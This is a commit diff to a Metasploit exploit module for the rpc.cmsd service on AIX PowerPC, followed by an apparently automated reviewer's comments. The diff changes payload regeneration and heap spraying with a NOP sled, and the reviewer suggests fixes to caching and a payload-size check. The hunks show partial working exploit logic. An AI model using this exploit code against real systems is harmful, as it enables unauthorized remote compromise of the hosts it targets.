Regenerate the payload with the specified AIX level
git-svn-id: file:///home/svn/framework3/trunk@8424 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
36c61ff5ed
commit
af978cbbdc
|
@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Arch' => 'ppc',
|
||||
'Platform' => 'aix',
|
||||
'Ret' => 0xcafebabe,
|
||||
'AIX' => '5.1',
|
||||
'Payload' => { 'AIX' => '5.1' },
|
||||
'Bruteforce' =>
|
||||
{
|
||||
#'Start' => { 'Ret' => 0x20230168 },
|
||||
|
@ -76,6 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(brute_target)
|
||||
|
||||
if not @aixpayload
|
||||
datastore['AIX'] = target['AIX']
|
||||
@aixpayload = regenerate_payload.encoded
|
||||
end
|
||||
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
|
||||
|
||||
begin
|
||||
|
@ -84,8 +87,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# spray the heap a bit (work around powerpc cache issues)
|
||||
buf = make_nops(1024 - payload.encoded.length)
|
||||
buf << payload.encoded
|
||||
buf = make_nops(1024 - @aixpayload.length)
|
||||
buf << @aixpayload
|
||||
xdr = XDR.encode(buf, buf)
|
||||
10.times {
|
||||
sunrpc_call(7, xdr, 2)
|
||||
|
@ -111,3 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
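Review bot: The added `datastore['AIX'] = target['AIX']` in `brute_exploit` writes to the module's datastore as a side effect of building the payload, so a value the operator set for that option is silently replaced and stays replaced after the method returns. The `if not @aixpayload` guard then caches the encoded payload for the life of the instance, so if an instance is ever reused with a different target the stale payload would be sent; whether instances are reused is not visible from this page. I would add a comment above the guard such as `# payload must be regenerated for the target's AIX level; cached so the brute-force loop encodes it only once`, and write the guard as `unless @aixpayload`. Separately, `make_nops(1024 - @aixpayload.length)` has no check that the payload fits in 1024 bytes, so a longer payload yields a negative count; a `fail_with`/`raise` before the subtraction would make that failure explicit. `brute_exploit` starts and ends outside the hunks shown.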